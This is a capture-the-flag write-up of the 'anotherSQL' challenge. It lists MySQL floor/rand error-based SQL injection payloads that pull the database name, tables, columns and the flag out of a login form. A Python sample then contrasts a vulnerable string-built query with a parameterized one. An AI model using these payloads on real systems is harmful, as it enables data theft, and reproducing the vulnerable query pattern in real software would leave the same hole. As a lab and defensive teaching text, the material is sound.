geek challenge 2021 anotherSQL (floor error-based injection)


I won't go into the fuzzing; in short, a lot of keywords are filtered, even "if" (yes, these days any username containing "if" makes you a big hacker xD). But floor is not filtered, so that's the way in.

For how the floor() function is used in SQL injection, see www.cnblogs.com/c1047509362…

Challenge: image.png

Enter a single quote (') as the username and anything as the password, and an error pops up:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1

After that it is just a sequence of queries. Note that the select must return enough columns (select 1,2,xxx) for the column count to match, otherwise you get a column-count mismatch error instead.

Test:
1' union select 1,2,count(*),floor(rand(0)*2) x from information_schema.schemata group by x#

Get the database name (true____flag):
1' union select 1,2,count(*),concat(floor(rand(0)*2),database()) x from information_schema.schemata group by x#

Get the table name (syclover):
1' union select 1,2,count(*),concat(floor(rand(0)*2),(select group_concat(table_name) from information_schema.tables where table_schema=database())) x from information_schema.schemata group by x#

Get the column names (id,uname,pwd,flag):
1' union select 1,2,count(*),concat(floor(rand(0)*2),(select group_concat(column_name) from information_schema.columns where table_name='syclover')) x from information_schema.schemata group by x#

Get the flag:
1' union select 1,2,count(*),concat(floor(rand(0)*2),(select flag from syclover)) x from information_schema.schemata group by x#
Duplicate entry '1SYC{U_4N0vv_3rR0r_Inj3c410n}' for key '<group_key>'
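The root cause behind the whole chain above is that the login handler pastes the username straight into the SQL text, so a keyword blacklist (filtering "if" and friends) is the only thing standing between the input and the parser. The following is an added example, not code from the challenge or this write-up: it uses an in-memory SQLite table standing in for the challenge's MySQL backend (table and column names taken from the write-up; the flag value is a placeholder) and shows the concatenating query failing on a lone quote exactly as the page's error message does, beside the parameterized form that treats the page's payload as an ordinary, non-matching username.

```python
import sqlite3

# Constructed stand-in for the challenge database: the syclover(id, uname, pwd, flag)
# layout follows the write-up; the flag is a placeholder, not the real one.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE syclover (id INTEGER, uname TEXT, pwd TEXT, flag TEXT)")
    conn.execute(
        "INSERT INTO syclover VALUES (1, 'admin', 'secret', 'SYC{placeholder_flag}')"
    )
    conn.commit()
    return conn


def vulnerable_login(conn, username, password):
    """The pattern the challenge is built on: user input spliced into the SQL string.
    A lone quote unbalances the literal and the engine raises a syntax error, which is
    what error-based techniques such as the floor()/group by trick rely on.
    Returns ("ok", row) or ("error", message)."""
    sql = f"SELECT id FROM syclover WHERE uname='{username}' AND pwd='{password}'"
    try:
        return ("ok", conn.execute(sql).fetchone())
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))


def safe_login(conn, username, password):
    """Parameterized form: values travel separately from the query text, so quotes,
    UNION or floor() inside the input are just characters of a username."""
    sql = "SELECT id FROM syclover WHERE uname=? AND pwd=?"
    return conn.execute(sql, (username, password)).fetchone()


# The write-up's final payload, used here purely as an input string (hypothetical test
# value copied from the page) to show that the parameterized query never interprets it.
PAGE_PAYLOAD = (
    "1' union select 1,2,count(*),concat(floor(rand(0)*2),(select flag from syclover)) x "
    "from information_schema.schemata group by x#"
)

if __name__ == "__main__":
    db = make_db()
    print(vulnerable_login(db, "'", "anything"))      # ('error', ...) like the page's MySQL error
    print(safe_login(db, "'", "anything"))             # None: no such user
    print(safe_login(db, PAGE_PAYLOAD, "anything"))    # None: payload is just a literal
    print(safe_login(db, "admin", "secret"))           # (1,): legitimate login still works
```

The defensive point is that the parameterized version needs no blacklist at all: the query shape is fixed before the values are bound, so the column-count and information_schema tricks above have nothing to attach to.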

Postscript: locate was not filtered in this challenge, so I originally wanted to do a boolean-based injection, but my skills were not up to it and I could not extract anything, sob. See www.cnblogs.com/silentEAG/p… for details.